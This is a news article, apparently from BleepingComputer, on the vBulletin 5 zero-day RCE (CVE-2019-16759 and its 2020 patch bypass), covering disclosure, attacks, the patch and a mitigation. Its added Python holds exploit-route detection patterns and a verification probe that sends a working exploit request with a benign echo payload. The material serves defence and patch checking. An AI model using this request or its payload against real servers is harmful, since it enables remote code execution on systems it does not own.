A simple one-line exploit has been published for a zero-day pre-authentication remote code execution (RCE) vulnerability in the vBulletin forum software.
vBulletin is an immensely popular online forum software utilized by large brands such as Electronic Arts, Zynga, Sony, Pearl Jam, NASA, Steam, and many more.
In September 2019, an anonymous researcher disclosed a zero-day RCE vulnerability in vBulletin 5.x (5.0.0 through 5.5.4), tracked as CVE-2019-16759.
The flaw was in vBulletin's PHP widget module: PHP code supplied in the widgetConfig[code] parameter of an ajax/render/widget_php request was evaluated on the server, so an attacker who had never logged into the forum could execute arbitrary PHP with a single request.
It was rated Critical with a CVSS score of 9.8 because exploitation is trivial over the network and yields remote command execution on the vBulletin server.
Yesterday, security researcher Amir Etemadieh (Zenofex) disclosed a new vBulletin zero-day that bypasses the patch issued in 2019 for CVE-2019-16759. The 2019 fix only blocked rendering the widget_php template directly; the widget_tabbedcontainer_tab_panel template still loads a child template named in the request, and naming widget_php as that child reaches the same vulnerable code.
The exploit is trivially easy to use: a single one-line command that sends one POST request to a vBulletin server is enough to execute commands on it, as illustrated in the image below.
[Image: PoC of vBulletin zero-day]
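Because the attack is a single request, the first question for anyone running vBulletin is whether that request has already hit their server. The Python below is an added example (not code from the article or from Zenofex's disclosure) that triages web-server access-log lines for both request shapes: the 2019 widget_php route and the 2020 bypass through widget_tabbedcontainer_tab_panel. The route and parameter names are taken from the public proof-of-concept requests and are an assumption this page does not itself print; the log lines are constructed. Standard access logs record only the request line, so a POST to the tabbed-container route can only be flagged as suspicious; confirming subWidgets[0][template]=widget_php needs the request body from a WAF or audit log.

```python
"""Triage vBulletin 5 access-log lines for the CVE-2019-16759 request shape
and the 2020 patch-bypass shape (widget_tabbedcontainer_tab_panel).

Added example for this page; not vBulletin code. The route and parameter
names are assumed from the public proof-of-concept requests for both bugs,
and the sample log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request shapes (assumption: taken from the published PoCs, not from this page)
OLD_ROUTE = "ajax/render/widget_php"                           # 2019 vector
BYPASS_ROUTE = "ajax/render/widget_tabbedcontainer_tab_panel"  # 2020 bypass
OLD_PARAM = "widgetConfig[code]"
BYPASS_PARAM = "subWidgets[0][template]=widget_php"


def classify_request(method, target, body=""):
    """Return a verdict string for one request, or None if it looks benign.

    `target` is the request path plus query string as logged; `body` is the
    POST body when a WAF/audit log provides it (plain access logs do not).
    """
    decoded = unquote_plus(target)
    body = unquote_plus(body or "")
    if OLD_ROUTE in decoded or OLD_PARAM in decoded or OLD_PARAM in body:
        return "CVE-2019-16759 request shape (widget_php rendered directly)"
    if BYPASS_PARAM in body or BYPASS_PARAM in decoded:
        return "2020 bypass confirmed (widget_php loaded as a sub-widget)"
    if BYPASS_ROUTE in decoded and method == "POST":
        # Legitimate front-end JS can also render this template, so this is a
        # lead to inspect, not a confirmed hit: the body is needed.
        return "possible 2020 bypass: POST to tabbed-container route, inspect body"
    return None


def triage_log(lines):
    """Yield (ip, time, verdict) for each log line matching a known shape."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["method"], m["target"])
        if verdict:
            yield m["ip"], m["time"], verdict


# Constructed sample lines (not real traffic): two benign, two suspicious.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Aug/2020:22:14:01 +0000] "GET /forum/ HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Aug/2020:22:14:05 +0000] "GET /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Aug/2020:22:15:30 +0000] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 200 1603 "-" "curl/7.68.0"',
    '198.51.100.9 - - [09/Aug/2020:22:16:02 +0000] "GET /index.php?routestring=ajax/render/widget_php&widgetConfig%5Bcode%5D=phpinfo%28%29%3B HTTP/1.1" 200 28840 "-" "python-requests/2.24"',
]

if __name__ == "__main__":
    for ip, when, verdict in triage_log(SAMPLE_LOG):
        print(f"{when}  {ip:<15}  {verdict}")
```

Run it over a real log with `triage_log(open("access.log"))`; a 200 response to a flagged request is the line to pivot on, since a successful render of widget_php means the supplied code ran.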
In a conversation with BleepingComputer, Etemadieh said he disclosed the vulnerability publicly because vBulletin had failed to properly patch it the first time and because he was able to offer a mitigation as part of the disclosure.
"I felt that, with it having already been a critical vulnerability that they failed to patch a year prior, releasing full disclosure was the best path."
"I also provided a fix with the disclosure to allow any customers a quick method to immediately prevent an attacker from being able to reach the vulnerable code."
"Companies need to take security seriously; researchers cannot constantly provide free labor to identify vulnerabilities."
"Something I always like to point out to the public is that I do not create the vulnerabilities in the code, I only provide the free labor to expose them," Etemadieh told BleepingComputer.
Attacks began immediately
Soon after the zero-day was published, vBulletin sites were already under attack.
According to Jeff Moss, aka The Dark Tangent and founder of the Black Hat and DEF CON security conferences, the defcon.org forum was attacked with this exploit three hours after it was disclosed.
vBulletin's own forum also went offline earlier today, presumably while a patch was being applied.
vBulletin releases a quick fix for zero-day bug
Due to the ease of use and severity of this vulnerability, BleepingComputer decided to hold off on reporting about it until a patch was available.
As of this afternoon, vBulletin has released a patch that disables the PHP module in vBulletin to mitigate the vulnerability.
"All older versions should be considered vulnerable. Sites running older versions of vBulletin need to be upgraded to vBulletin 5.6.2 as soon as possible. For more information on upgrading please see Quick Overview: Upgrading vBulletin Connect in the support forums," vBulletin's advisory notes.
vBulletin states that this module will be removed entirely in version 5.6.4.
Production sites that cannot apply the patch right away can also mitigate the vulnerability by removing the template the exploit relies on:
1. Put the site into debug mode.
2. Log into the AdminCP.
3. Go to Styles -> Style Manager.
4. Open the template list for the MASTER style.
5. Scroll to the bottom, to the Module Templates section.
6. Highlight the widget_php module.
7. Click the Revert button.
Reverting the template in the MASTER style deletes it from the site entirely, which makes the PHP Module inoperative. Turn debug mode off again once the template is gone.
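Whether the patch or the template revert was applied, the fix is only worth trusting once it has been exercised. The check below is an added example (not vBulletin's tooling) that sends a harmless probe through the bypass route and reports whether the server echoed a marker back, which would mean template PHP still executes. The route and parameter names are again those of the public PoC, an assumption not printed on this page; run it only against a forum you administer.

```python
"""Post-mitigation check for the vBulletin PHP module.

Added example for this page, not vBulletin's own tooling. Sends a harmless
probe through the 2020 bypass route (route and parameter names assumed from
the public PoC, not printed on this page) and reports whether the server
echoed the marker, i.e. whether template PHP still executes. Only run it
against a forum you administer.
"""
import secrets
import urllib.error
import urllib.parse
import urllib.request

BYPASS_PATH = "/ajax/render/widget_tabbedcontainer_tab_panel"  # assumption: PoC route


def build_probe(base_url, marker):
    """Return (url, form_body) for a probe whose only effect is to echo `marker`."""
    body = urllib.parse.urlencode({
        "subWidgets[0][template]": "widget_php",             # child template the bypass loads
        "subWidgets[0][config][code]": f'echo "{marker}";',  # benign PHP payload
    }).encode()
    return base_url.rstrip("/") + BYPASS_PATH, body


def module_disabled(response_body, marker):
    """True when the marker was NOT echoed back, i.e. the PHP module did not run."""
    return marker not in response_body


def probe_site(base_url, timeout=15):
    """POST the probe to a forum you own; True means the mitigation holds."""
    marker = "vbcheck_" + secrets.token_hex(8)   # random so a cached page cannot fool us
    url, body = build_probe(base_url, marker)
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"User-Agent": "vb-php-module-check",
                 "Content-Type": "application/x-www-form-urlencoded"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            text = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        # A 4xx/5xx body is still worth checking: an error page that contains
        # the marker would mean the code ran before the request failed.
        text = exc.read().decode("utf-8", "replace")
    return module_disabled(text, marker)


if __name__ == "__main__":
    import sys
    ok = probe_site(sys.argv[1])
    print("PHP module inoperative" if ok else "STILL VULNERABLE: marker was echoed")
    sys.exit(0 if ok else 2)
```

Invoke it as `python3 vbcheck.py https://forum.example.test/`; a non-zero exit means the widget_php template is still rendering supplied code and the mitigation did not take.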
All vBulletin users should install the patch or apply the mitigation above immediately, before their servers are compromised.
Update 8/10/20: Added statement from Amir Etemadieh.